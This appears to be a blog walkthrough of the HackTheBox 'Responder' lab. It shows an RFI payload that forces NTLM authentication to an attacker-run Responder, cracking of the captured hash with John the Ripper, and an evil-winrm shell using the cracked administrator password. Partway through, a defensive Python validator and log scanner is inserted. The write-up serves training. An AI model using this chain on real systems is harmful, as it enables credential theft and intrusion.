Responder Starting Point HacktheBox Walkthrough

protonsec
7 min readAug 1, 2022


Responder is a very good Starting Point challenge by HackTheBox. In this article we are going to exploit it.


First of all, visit the machine's IP address in your browser.


Uh oh! Is the website not live?

If you observe closely you will see that the page tries to load but fails, and that our IP address has been replaced in the address bar by the domain unika.htb. So we have to add a hosts entry to access it.

wesecure1337@kali:~$ sudo nano /etc/hosts
127.0.0.1 localhost
10.129.247.235 unika.htb

After editing /etc/hosts, visit the site again and you will be able to see it.


Now we are going to scan this host for available services:

wesecure1337@kali:~$ nmap -sV 10.129.247.235
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 17:53 IST
Nmap scan report for 10.129.247.235
Host is up (0.25s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.43 seconds

From the scan result we conclude that only one port, 80/tcp, is open. So I submitted Task 1, but wait, I got the wrong answer. Is something wrong with nmap? Here's the catch: if you don't specify a port range, nmap scans only the 1000 most commonly used ports. That means we have to scan all ports to get the right answer, so I scanned all of them:

wesecure1337@kali:~$ nmap -sV -p- 10.129.247.235
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 17:53 IST
Stats: 0:08:18 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 02.15% done; ETC: 18:06 (10:03:20 remaining)
Stats: 3:17:85 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 38.73% done; ETC: 18:06 (08:27:02 remaining)

This is the time it requires on my Intel i3 11th generation processor.

So I have to figure out some other way. I'm going to scan the first 10000 ports:

wesecure1337@kali:~$ nmap -sV -p1-10000 10.129.247.235
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 18:13 IST
Nmap scan report for unika.htb (10.129.247.235)
Host is up (0.24s latency).
Not shown: 5998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.93 seconds

From the scan results I found some useful information:

PORT     STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Now let's answer Task 1 again:

TASK 1: How many TCP ports are open on the machine?
2

We got the correct answer. Wow!!!

As we noticed when we visited the IP address, another domain, unika.htb, showed up:

TASK 2: When visiting the web service using the IP address, what is the domain that we are being redirected to?
unika.htb

From our scan results we see that PHP/8.1.1 is used on the server side as the scripting language.

TASK 3: Which scripting language is being used on the server to generate webpages?
php

Looking at the source code of the website, we see that a page parameter is used to select which page to load.

TASK 4: What is the name of the URL parameter which is used to load different language versions of the webpage?
page

LFI (Local File Inclusion) is a vulnerability where a user can make the application include files on the server that they were never meant to access. Looking at the options, we come to Task 5:

TASK 5: Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
../../../../../../../../windows/system32/drivers/etc/hosts

In the case of RFI (Remote File Inclusion), the value that makes the server fetch a file from a remote host is:

TASK 6: Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
//10.10.14.6/somefile

A quick search gives us the answer:

TASK 7: What does NTLM stand for?
New Technology Lan Manager

The -I flag is used to specify the network interface.

TASK 8: Which flag do we use in the Responder utility to specify the network interface?
-I

john is preinstalled in Kali Linux and is used for many password-cracking (brute-force) attacks.

TASK 9: There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?
John The Ripper

Now we have to exploit the server.

First of all, get the Responder tool from GitHub:

wesecure1337@kali:~$ git clone https://github.com/lgandx/Responder
wesecure1337@kali:~$ cd Responder
wesecure1337@kali:~$ python3 Responder.py -I tun0

This will start Responder on our tun0 interface.

Now get your tun0 IP address from the terminal:

wesecure1337@kali:~$ ifconfig tun0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet your_tun0_ip netmask 255.255.254.0 destination 10.10.16.80
inet6 dead:beef:4::104e prefixlen 64 scopeid 0x0<global>
inet6 fe80::ac34:ad8a:3c3f:7e18 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 2995 bytes 2652631 (2.5 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 152234 bytes 9137041 (8.7 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Visit the URL:

http://unika.htb/?page=//[your_tun0_ip]/wesecure1337

After visiting the URL, go to your Responder terminal to see the hash:

[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 10.129.247.235
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:5088e52725bb...

Copy the hash and save it to a file named wesecure1337.txt.

Now we are going to use John the Ripper to crack this password hash:
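The RFI value from Task 6 and the request above work because the `page` parameter is handed straight to PHP's include, and on Windows a `//host/share` path is opened over SMB, which is what makes the server authenticate to our Responder listener. The following is an added example (not code from the original post or from HackTheBox) showing the defender's side: an allow-list validator for the `page` parameter that classifies the Task 5/6 values, plus a scan over constructed Apache access-log lines that flags the LFI and RFI attempts. The allowed page names other than french.html, the web root and the log lines are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Pages the site is meant to serve; only french.html is on the page, the rest are assumed.
ALLOWED_PAGES = {"english.html", "french.html", "german.html"}

# Apache combined-log prefix: client IP, identd, user, [timestamp], "METHOD path HTTP/x.y"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def classify_page_value(value):
    """Return 'allowed', 'lfi', 'rfi' or 'unknown' for a raw `page` value."""
    v = unquote(value).replace("\\", "/")  # decode %XX once more, unify slashes
    # RFI: a URL scheme, or a protocol-relative/UNC path such as //10.10.14.6/somefile.
    # On Windows PHP opens a UNC path over SMB, which is why the server sends its
    # NetNTLMv2 response to whoever is listening at that address.
    if v.startswith("//") or re.match(r"^[a-z][a-z0-9+.-]*://", v, re.I):
        return "rfi"
    # LFI: parent-directory traversal, absolute or drive-letter paths, NUL bytes.
    if ".." in v.split("/") or v.startswith("/") or re.match(r"^[a-z]:/", v, re.I) or "\0" in v:
        return "lfi"
    return "allowed" if v in ALLOWED_PAGES else "unknown"


def resolve_page(value, web_root="C:/htdocs"):
    """Hardened replacement for include($_GET['page']): only an exact allow-listed
    name maps to a file; everything else yields None. web_root is assumed."""
    return f"{web_root}/{value}" if classify_page_value(value) == "allowed" else None


def scan_access_log(text):
    """Return (client_ip, page_value, verdict) for every request whose `page` is not allow-listed."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m.groups()
        for value in parse_qs(urlsplit(path).query).get("page", []):
            verdict = classify_page_value(value)
            if verdict != "allowed":
                hits.append((ip, value, verdict))
    return hits


# Constructed sample of an Apache access log for unika.htb (not taken from the page).
SAMPLE_LOG = """\
10.10.14.6 - - [28/Jul/2022:18:30:11 +0530] "GET /?page=french.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.6 - - [28/Jul/2022:18:31:02 +0530] "GET /?page=..%2F..%2F..%2Fwindows%2Fsystem32%2Fdrivers%2Fetc%2Fhosts HTTP/1.1" 200 824 "-" "curl/7.81.0"
10.10.14.6 - - [28/Jul/2022:18:40:47 +0530] "GET /?page=//10.10.14.6/wesecure1337 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.6 - - [28/Jul/2022:18:41:09 +0530] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""
```

`scan_access_log(SAMPLE_LOG)` returns only the traversal and the UNC request; the URL-encoded `%2F` variant is caught because the query string is decoded before classification.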

wesecure1337@kali:~$ john wesecure1337.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton (Administrator)
1g 0:00:00:00 DONE (2022-07-28 18:55) 100.0g/s 409600p/s 409600c/s 409600C/s slimshady..oooooo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

From this we finally cracked the administrator password, which is badminton.

TASK 10: What is the password for the administrator user?
badminton

From our scan results:

TASK 11: We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
5985

Now follow the steps to get the flag:

wesecure1337@kali:~$ evil-winrm -i 10.129.247.235 -u administrator -p badminton
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Now we have a shell on the server.

*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> ls

    Directory: C:\Users\Administrator

Mode    LastWriteTime          Length Name
----    -------------          ------ ----
d-r---  10/11/2020   7:19 AM          3D Objects
d-r---  10/11/2020   7:19 AM          Contacts
d-r---  3/9/2022     5:34 PM          Desktop
d-r---  3/10/2022    4:51 AM          Documents
d-r---  10/11/2020   7:19 AM          Downloads
d-r---  10/11/2020   7:19 AM          Favorites
d-r---  10/11/2020   7:19 AM          Links
d-r---  10/11/2020   7:19 AM          Music
d-r---  4/27/2020    6:01 AM          OneDrive
d-r---  10/11/2020   7:19 AM          Pictures
d-r---  10/11/2020   7:19 AM          Saved Games
d-r---  10/11/2020   7:19 AM          Searches
d-r---  10/11/2020   7:19 AM          Videos

*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users> ls

    Directory: C:\Users

Mode    LastWriteTime          Length Name
----    -------------          ------ ----
d-----  3/9/2022     5:35 PM          Administrator
d-----  3/9/2022     5:33 PM          mike
d-r---  10/10/2020  12:37 PM          Public

*Evil-WinRM* PS C:\Users> cd mike
*Evil-WinRM* PS C:\Users\mike> ls

    Directory: C:\Users\mike

Mode    LastWriteTime          Length Name
----    -------------          ------ ----
d-----  3/10/2022    4:51 AM          Desktop

*Evil-WinRM* PS C:\Users\mike> cd Desktop
*Evil-WinRM* PS C:\Users\mike\Desktop> ls

    Directory: C:\Users\mike\Desktop

Mode    LastWriteTime          Length Name
----    -------------          ------ ----
-a----  3/10/2022    4:50 AM      32 flag.txt

*Evil-WinRM* PS C:\Users\mike\Desktop> cat flag.txt
ea81b7afddd03efaa0945333ed147fac
*Evil-WinRM* PS C:\Users\mike\Desktop>

Finally, we got the flag.

SUBMIT FLAG: Submit root flag
ea81b7afddd03efaa0945333ed147fac

Voila!!! We have successfully solved the Responder Starting Point HacktheBox challenge. If you really enjoyed this walkthrough, do check out our other writeups on related topics.

Let’s get connected

Twitter: proton_sec
GitHub: proton-sec
LinkedIn: protonsec

If you want to appreciate and support my work here you go…

Thanks for Reading!!!
